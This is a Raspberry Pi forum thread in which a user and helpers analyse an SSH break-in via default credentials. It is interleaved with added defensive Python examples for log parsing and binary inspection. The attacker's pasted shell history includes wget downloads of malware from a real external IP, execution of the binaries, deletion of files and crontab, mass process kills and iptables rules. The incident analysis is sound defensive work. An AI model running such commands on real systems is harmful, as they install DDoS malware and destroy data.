prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

mystery login

Sun Feb 19, 2017 6:43 am

I have a pi2 with Jessie.
Also on my router a port forward on a non-obvious port.

Logged on this morning and it said last login was two days ago at a time I knew I would not login.
Looked like an external address.
History showed some weird commands I don't think I issued.
Will investigate further but currently pi switched off and port forward deleted.
As I remember commands were wget from some external IP, and iptables commands.
Questions:
I guess a port scanner could find the port but how do they get past the root password?
Should I disable root login from IP?
Anyone seen this ?

Thanks
Jim

mfa298
Posts: 1387
Joined: Tue Apr 22, 2014 11:18 am

Re: mystery login

Sun Feb 19, 2017 7:52 am

prioryjim wrote: I have a pi2 with Jessie.
Also on my router a port forward on a non-obvious port.

Logged on this morning and it said last login was two days ago at a time I knew I would not login.
Looked like an external address.
History showed some weird commands I don't think I issued.
Will investigate further but currently pi switched off and port forward deleted.
As I remember commands were wget from some external IP, and iptables commands.
Questions:
I guess a port scanner could find the port but how do they get past the root password?
Should I disable root login from IP?
Anyone seen this ?

Thanks
Jim
Assuming you're using Raspbian, have you changed the default password for the pi user? Most ssh attacks work by trying lots of common user/password combinations.

Heater
Posts: 15949
Joined: Tue Jul 17, 2012 3:02 pm

Re: mystery login

Sun Feb 19, 2017 9:19 am

Forwarding to a non-obvious port on your Pi is no help if the port open to the public on the router is the standard one.

What was that external address? If you look in /var/log/auth you should be able to find the login recorded and the IP address it was from.

It would be nice to know exactly what that wget command was fetching.

I presume you did change the default password and preferably changed the pi user for a different one.

Disabling root logins from the net is a good idea. It removes one obvious username for attackers to try.
Memory in C++ is a leaky abstraction.

prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

Re: mystery login

Sun Feb 19, 2017 2:26 pm

Yes, it's powered off, I will investigate in more detail tomorrow.
Thanks
Jim

prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

Re: mystery login

Mon Feb 20, 2017 8:36 am

A couple of logins from
root pts/1 222.33.37.154 Fri Feb 17 16:32 - 18:34 (02:02)

The commands I don't remember issuing


   64  20/02/17 08:25:55 cd /tmp
   65  20/02/17 08:25:55 rm -rf .*
   66  20/02/17 08:25:55 rm -rf *
   67  20/02/17 08:25:55 service iptables stop
   68  20/02/17 08:25:55 yum -y install wget
   69  20/02/17 08:25:55 apt-get install wget
   70  20/02/17 08:25:55 rm -f /usr/bin/.sshd
   71  20/02/17 08:25:55 rm -f .17234
   72  20/02/17 08:25:55 killall -9 .17234
   73  20/02/17 08:25:55 killall -9 .sshd
   74  20/02/17 08:25:55 rm -rf /etc/crontab
   75  20/02/17 08:25:55 find ./ -name "S90*" | grep -v S90single | grep -v reboot | grep -v S90halt |xargs rm -fr
   76  20/02/17 08:25:55 ps -ef | grep -v 'ssh' |awk '{if ($3 == 1) print $2}' | xargs kill -9
   77  20/02/17 08:25:55 rm -rf /usr/bin/bsd-port/getty
   78  20/02/17 08:25:55 rm -rf /usr/bin/bsd-port/*
   79  20/02/17 08:25:55 killall -9 getty
   80  20/02/17 08:25:55 wget -c http://123.249.34.199:9655/17733
   81  20/02/17 08:25:55 chmod 777 17733
   82  20/02/17 08:25:55 mv 17733 .17733
   83  20/02/17 08:25:55 wget -c http://123.249.34.199:9655/aa
   84  20/02/17 08:25:55 chmod 777 aa
   85  20/02/17 08:25:55 ps -ef | grep -v 'ssh' |awk '{if ($3 == 1) print $2}' | xargs kill -9
   86  20/02/17 08:25:55 ./aa
   87  20/02/17 08:25:55 ./.17733
   88  20/02/17 08:25:55 iptables -I INPUT -s 46.105.94.61 -j DROP
   89  20/02/17 08:25:55 iptables -I INPUT -s 46.105.94.60 -j DROP
   90  20/02/17 08:25:55 iptables -I INPUT -s 198.50.134.48 -j DROP
   91  20/02/17 08:25:55 iptables -I INPUT -s 164.132.170.78 -j DROP
   92  20/02/17 08:25:55 iptables -I INPUT -s 164.132.4.3 -j DROP
   93  20/02/17 08:25:55 iptables -I INPUT -s 149.202.219.49 -j DROP
   94  20/02/17 08:25:55 iptables -I INPUT -s 183.131.83.41 -j DROP
I will reload Jessie on a new card.

I wonder what other things on my net may be compromised, Windows 10 etc.
Thanks
Jim

rpdom
Posts: 17173
Joined: Sun May 06, 2012 5:17 am
Location: Chelmsford, Essex, UK

Re: mystery login

Mon Feb 20, 2017 9:43 am

Well, the obvious bad news is that something has got into your insecure Pi and messed things up a bit and tried to install some malware of some sorts.

The good news is that software (the aa and 13377 files) are for PC only and won't run on the ARM chip in the Pi.

Other things it has done: it has disabled various firewall rules (which probably weren't enabled anyway), and deleted some system files - most notably /etc/crontab - then killed any existing ssh sessions.

It may be possible to clean the system, but I wouldn't bother, I'd create a new card or go back to a clean backup of it.

I don't know what else may have happened prior to those log entries, but I don't think they managed to get beyond your Pi.

Heater
Posts: 15949
Joined: Tue Jul 17, 2012 3:02 pm

Re: mystery login

Mon Feb 20, 2017 9:44 am

Interesting. I fetched the file 17733 that is shown in one of your wget commands; it is reported as malware by virus scanners. Not sure what yet.

Had you changed the default password before this happened?

Did you have a strong password or do you think it was short and easily guessable?

Did they log straight in as root or what?

It would be nice to know this because if they did not just guess the password, they got in by some other means we might like to know about.

mfa298
Posts: 1387
Joined: Tue Apr 22, 2014 11:18 am

Re: mystery login

Mon Feb 20, 2017 9:57 am

prioryjim wrote: A couple of logins from
root pts/1 222.33.37.154 Fri Feb 17 16:32 - 18:34 (02:02)

The commands I don't remember issuing

...

I will reload Jessie on a new card.

I wonder what other things on my net may be compromised, Windows 10 etc.
Looks like it came from China and tried binaries for an Intel system (which shouldn't work on the Pi), so that attempt may not have done much. However, that may not have been the first compromise of your Pi, so it's possible other things had been put in and compromised other systems.

It looks like it's a DDoS tool:
https://www.virustotal.com/en/file/ab3c ... 484737930/
https://www.virustotal.com/en/file/3eb4 ... 487584080/

prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

Re: mystery login

Mon Feb 20, 2017 10:03 am

I usually use root and don't use any other user.
So I guess I would not change those passwords.
I changed root to a password that I don't think you could guess.
Yes they logged in as root.
I have closed my port forward.
And will create a new SD card.
And change all passwords.
Plus disable root login from net.
Any other tips?
Thanks for the info.
Are there any files that may be of use? I still have the SD card.
Regards
Jim

mfa298
Posts: 1387
Joined: Tue Apr 22, 2014 11:18 am

Re: mystery login

Mon Feb 20, 2017 10:05 am

rpdom wrote: then killed any existing ssh sessions.
If you're looking at this line, then it's not killing ssh:


   76  20/02/17 08:25:55 ps -ef | grep -v 'ssh' |awk '{if ($3 == 1) print $2}' | xargs kill -9
That's looking for anything that's not ssh (grep -v) and where the parent PID is 1 (awk).

That's going to kill most daemons on the system (but not ssh). If you want to see what it would match, a variation is:


ps -ef | grep -v 'ssh' |awk '{if ($3 == 1) print $0}'
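
To make the effect of that filter concrete, here is an added example (mine, not code from the thread) that replays the grep/awk logic in Python over a constructed `ps -ef` snapshot and reports what the original line 76 would have killed; the process names in the snapshot are assumptions. It also shows the side effect of `grep -v 'ssh'`: any line that mentions "ssh" anywhere is spared, not only sshd itself.

```python
# Added example (not from the thread): replay the filter from history line 76
# over a constructed `ps -ef` snapshot and report what it would have killed,
# without running kill. grep -v 'ssh' drops any line containing "ssh" anywhere;
# awk '$3 == 1' keeps only processes whose parent is PID 1 (init/systemd).

# Constructed snapshot in `ps -ef` layout; process names are assumptions.
PS_SNAPSHOT = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 16:00 ?        00:00:02 /sbin/init
root       312     1  0 16:00 ?        00:00:00 /usr/sbin/cron -f
root       330     1  0 16:00 ?        00:00:00 /usr/sbin/sshd -D
root       402   330  0 16:32 ?        00:00:00 sshd: root@pts/1
root       455   402  0 16:32 pts/1    00:00:00 -bash
root       460     1  0 16:00 ?        00:00:01 /usr/sbin/rsyslogd -n
root       470     1  0 16:00 ?        00:00:00 /usr/bin/python /opt/sshwatch.py
pi         520     1  0 16:01 ?        00:00:00 /usr/sbin/vsftpd
root       600   455  0 18:30 pts/1    00:00:00 ps -ef
"""


def classify(ps_text):
    """Split PID-1 children into (killed, spared) lists of (pid, cmd) tuples."""
    killed, spared = [], []
    for line in ps_text.splitlines()[1:]:        # skip the header row
        fields = line.split(None, 7)             # UID PID PPID C STIME TTY TIME CMD
        if len(fields) < 8 or fields[2] != "1":  # awk: parent PID must be 1
            continue
        pid, cmd = fields[1], fields[7]
        if "ssh" in line:                        # grep -v 'ssh' tests the whole line,
            spared.append((pid, cmd))            # so anything mentioning ssh survives
        else:
            killed.append((pid, cmd))            # these would get kill -9
    return killed, spared


if __name__ == "__main__":
    killed, spared = classify(PS_SNAPSHOT)
    print("would be killed:", killed)
    print("spared by grep -v 'ssh':", spared)
```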

prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

Re: mystery login

Mon Feb 20, 2017 10:18 am

Also, for info:
The port forward was to the standard ssh port on the pi, but on the other side of the router it was a totally different port.
So I suspect they may use some form of port scanner?
Jim

RaTTuS
Posts: 10559
Joined: Tue Nov 29, 2011 11:12 am
Location: North West UK

Re: mystery login

Mon Feb 20, 2017 10:21 am

prioryjim wrote: I usually use root and don't use any other user.
So I guess I would not change those passwords.
I changed root to a password that I don't think you could guess.
Yes they logged in as root.
I have closed my port forward.
And will create a new SD card.
And change all passwords.
Plus disable root login from net.
Any other tips?
Thanks for the info.
Are there any files that may be of use? I still have the SD card.
Regards
Jim
1) There is no need to use root.
2) On a new card: add a new user, set up sudo for that user, disable user pi.
3) Never log in as root; use sudo, or su - if you really want to.

prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

Re: mystery login

Mon Feb 20, 2017 3:18 pm

Re: The good news is that software (the aa and 13377 files) are for PC only and won't run on the ARM chip in the Pi.

Given they ssh'd onto the system and were issuing Linux commands, I wonder why they would put non-Linux executables on.
And then attempt to run them with
./aa
./.17733

Thanks
Jim

achrn
Posts: 412
Joined: Wed Feb 13, 2013 1:22 pm

Re: mystery login

Mon Feb 20, 2017 3:40 pm

rpdom wrote: Other things it has done: it has disabled various firewall rules (which probably weren't enabled anyway), and deleted some system files - most notably /etc/crontab - then killed any existing ssh sessions.
I think it hasn't deleted any firewall rules, it has added firewall rules blocking all traffic from a number of IP addresses.

prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

Re: mystery login

Tue Feb 21, 2017 8:10 am

Also, around the time of one of the logins I note my router log had:

2017-1-12 17:55:36 Kernel Informational klog 104000 104000 possible SYN flooding on port 7547. Sending cookies.

Probably connected?

Thanks
Jim

jondallimore
Posts: 257
Joined: Thu Aug 04, 2016 11:02 pm

Re: mystery login

Tue Feb 21, 2017 9:05 am

Instead of using port forwarding, use RealVNC Cloud or TeamViewer. Or, for just SSH, try Weaved (might have a new name now?). Keeps the router secure.

jojopi
Posts: 3271
Joined: Tue Oct 11, 2011 8:38 pm

Re: mystery login

Tue Feb 21, 2017 10:02 am

prioryjim wrote: I guess a port scanner could find the port but how do they get past the root password?
This question remains pertinent. Allowing remote root login by password is not ideal, but it should not lead to compromise unless the password is rather bad or somehow leaks out.

Allowing OpenSSH access from the internet is okay, if you need to. I would trust it more than any GUI-based remote-access method, and even most VPNs.

Did the attackers initially log in as root, or did they gain access by some other method first? Have they changed your root password, or installed authorized_keys for root?

Any more clues as to how many guesses it would take to brute-force or dictionary-attack the password? I have rarely seen more than a few dozen attempts before they move on to a softer target.
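
Both the "look in the auth log for the login and its IP" advice earlier and the "how many guesses did it take" question can be answered from sshd's log lines. Here is an added example (mine, not from the thread) that parses Raspbian-style auth.log entries and, for each accepted login, counts the failed attempts that came from the same address beforehand; the log lines are constructed, and /var/log/auth.log as the file path is assumed.

```python
# Added example (not from the thread): pull SSH logins out of sshd's auth.log
# lines and, for each accepted login, count how many failed attempts came from
# the same source address beforehand. Answers "where did they log in from" and
# "how many guesses did it take" from the log alone, with no guesswork.
import re
from collections import defaultdict

# Constructed auth.log lines in Raspbian Jessie's format; not the real log.
SAMPLE_AUTH_LOG = """\
Feb 17 09:02:11 raspberrypi sshd[1102]: Accepted publickey for pi from 192.168.1.20 port 50110 ssh2
Feb 17 16:31:40 raspberrypi sshd[1220]: Failed password for invalid user admin from 222.33.37.154 port 51980 ssh2
Feb 17 16:31:44 raspberrypi sshd[1222]: Failed password for root from 222.33.37.154 port 51991 ssh2
Feb 17 16:31:49 raspberrypi sshd[1224]: Failed password for pi from 222.33.37.154 port 52003 ssh2
Feb 17 16:32:02 raspberrypi sshd[1226]: Accepted password for root from 222.33.37.154 port 52015 ssh2
Feb 17 16:32:02 raspberrypi sshd[1226]: pam_unix(sshd:session): session opened for user root by (uid=0)
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def summarize_logins(lines):
    """Return one dict per accepted login, with the failures that preceded it from that IP."""
    failures = defaultdict(int)   # source IP -> failed attempts since its last success
    logins = []
    for line in lines:
        m = LOGIN_RE.match(line)
        if not m:
            continue              # pam/session lines and anything that is not a login
        ip = m["ip"]
        if m["result"] == "Failed":
            failures[ip] += 1
            continue
        logins.append({"time": m["ts"], "user": m["user"], "method": m["method"],
                       "ip": ip, "failed_before": failures[ip]})
        failures[ip] = 0          # start counting afresh after a success from this IP
    return logins


if __name__ == "__main__":
    for entry in summarize_logins(SAMPLE_AUTH_LOG.splitlines()):
        print(entry)
```

For a real box, feed it `open("/var/log/auth.log").readlines()`; the rotated copies (auth.log.1 and the gzipped ones) hold the earlier days, which matter when the first compromise may predate the login you noticed.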

mfa298
Posts: 1387
Joined: Tue Apr 22, 2014 11:18 am

Re: mystery login

Tue Feb 21, 2017 10:09 am

jojopi wrote: Allowing OpenSSH access from the internet is okay, if you need to. I would trust it more than any GUI-based remote-access method, and even most VPNs.

Did the attackers initially log in as root, or did they gain access by some other method first? Have they changed your root password, or installed authorized_keys for root?
Without a full forensic analysis it might be hard to determine what happened. However, I have seen past exploits where they've got in through some other means and then either added in something that connects out to give them shell access, or they've put in a backdoored ssh daemon, meaning they can bypass the root password. These obviously require them to have had access previously, but that could have been days/weeks/months/years ago; it could also occur from installing malicious software (one of the reasons that just blindly following guides is bad).

Heater
Posts: 15949
Joined: Tue Jul 17, 2012 3:02 pm

Re: mystery login

Tue Feb 21, 2017 12:14 pm

prioryjim,
I usually use root and don't use any other user.
So I guess I would not change those passwords.
Well, did you or did you not?

What you have written there implies that your machine still had the user "pi" and the default password for it.

In which case we perhaps know how they got in!
Yes they logged in as root.
Ultimately they did. Who knows how they got to that (Through the pi user maybe?)

An interesting point has been raised here: did you install any software to the Pi from any place other than apt-get? Did you add any sources to your apt sources list, as is often suggested in misguided installation instructions?

Heater
Posts: 15949
Joined: Tue Jul 17, 2012 3:02 pm

Re: mystery login

Tue Feb 21, 2017 12:41 pm

It's interesting to run those files that were fetched with wget through "strings". Oddly, they are x86 Linux executables and they have not been stripped.

The "aa" file contains:

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)"

I'd never heard of TencentTraveler but it seems to be a very widely used browser in China. So we can guess where this attack comes from. This code is obviously making HTTP requests some place.
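
The "x86 Linux executables that won't run on the Pi's ARM chip" observation from the last few posts can be confirmed from the file header alone, without executing anything. Here is an added example (mine, not from the thread) that reads the ELF identification bytes and the e_machine field of a dropped binary; the two headers it inspects are constructed stand-ins, not the files fetched in the thread.

```python
# Added example (not from the thread): read the ELF identification header of a
# dropped binary to see which CPU it was built for. This is how you confirm the
# "x86 Linux executables that won't run on an ARM Pi" observation safely:
# only the first 20 bytes of the file are inspected, nothing is run.
import struct

EM_NAMES = {3: "x86 (i386)", 40: "ARM (32-bit)", 62: "x86-64", 183: "AArch64"}


def describe_elf(blob):
    """Return (bits, endianness, machine name) for an ELF header, or None if not ELF."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return None
    bits = {1: 32, 2: 64}.get(blob[4])               # EI_CLASS
    endian = {1: "<", 2: ">"}.get(blob[5])           # EI_DATA: 1 = little, 2 = big
    if bits is None or endian is None:
        return None
    e_machine = struct.unpack(endian + "H", blob[18:20])[0]
    machine = EM_NAMES.get(e_machine, "unknown (%d)" % e_machine)
    return bits, "little" if endian == "<" else "big", machine


def runs_on_pi2(blob):
    """A Pi 2 on 32-bit Raspbian only runs 32-bit little-endian ARM ELF files."""
    return describe_elf(blob) == (32, "little", "ARM (32-bit)")


def elf_stub(bits, machine):
    """Build a constructed 20-byte ELF header (little-endian, ET_EXEC) for testing."""
    ident = b"\x7fELF" + bytes([bits // 32, 1, 1, 0, 0]) + bytes(7)
    return ident + struct.pack("<HH", 2, machine)   # e_type = EXEC, e_machine


# Constructed stand-ins, not the files actually fetched in the thread.
X86_64_DROPPER = elf_stub(64, 62)
ARM_BINARY = elf_stub(32, 40)

if __name__ == "__main__":
    for name, blob in (("x86-64 stub", X86_64_DROPPER), ("ARM stub", ARM_BINARY)):
        print(name, describe_elf(blob), "runs on Pi 2:", runs_on_pi2(blob))
```

For a real file, pass `open(path, "rb").read(20)` to `describe_elf` from a copy of the SD card mounted read-only on another machine.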

prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

Re: mystery login

Wed Feb 22, 2017 9:08 am

On the original install I changed the root password.
It was a word, but you would be unlikely to guess it.
Probably didn't change pi password.
Most stuff was apt-get, but tvheadend was built from source.
Plus ftp (not sftp), I think it was vsftpd or something.
Security cam ftps images to pi. It needed root password.
ftp is disabled at the moment.

Is it possible the security cam (from China) has some trojan?

Also I have the SD card if anyone needs any files to inspect.
Thanks
Jim

B.Goode
Posts: 10356
Joined: Mon Sep 01, 2014 4:03 pm
Location: UK

Re: mystery login

Wed Feb 22, 2017 9:23 am

Probably didn't change pi password.
So I can log in as pi:raspberry.

Then using default powers endowed by sudo I can use passwd to set/change the password of any account on the system, or create new accounts, including root.

Game Over!

prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

Re: mystery login

Wed Feb 22, 2017 9:44 am

OK, I failed on that!
But root password didn't change.

Any files of interest?
Thanks
Jim

Heater
Posts: 15949
Joined: Tue Jul 17, 2012 3:02 pm

Re: mystery login

Wed Feb 22, 2017 10:22 am

Lesson learned.

Probably best to reflash that SD and move on. Those files are dangerous!

What I found interesting is that whatever antivirus software is built into Win 10 nowadays flagged those files as malware and automatically deleted them. Even though they are not Windows executables.

Which implies that there are binary files you cannot have on a Win10 machine. They might be harmless data but Win 10 will delete them!

prioryjim
Posts: 108
Joined: Tue Mar 06, 2012 12:23 pm
Location: Preston, UK

Re: mystery login

Wed Feb 22, 2017 10:38 am

OK, thanks, I have a new SD already.

Wonder about the China web cam?

Jim
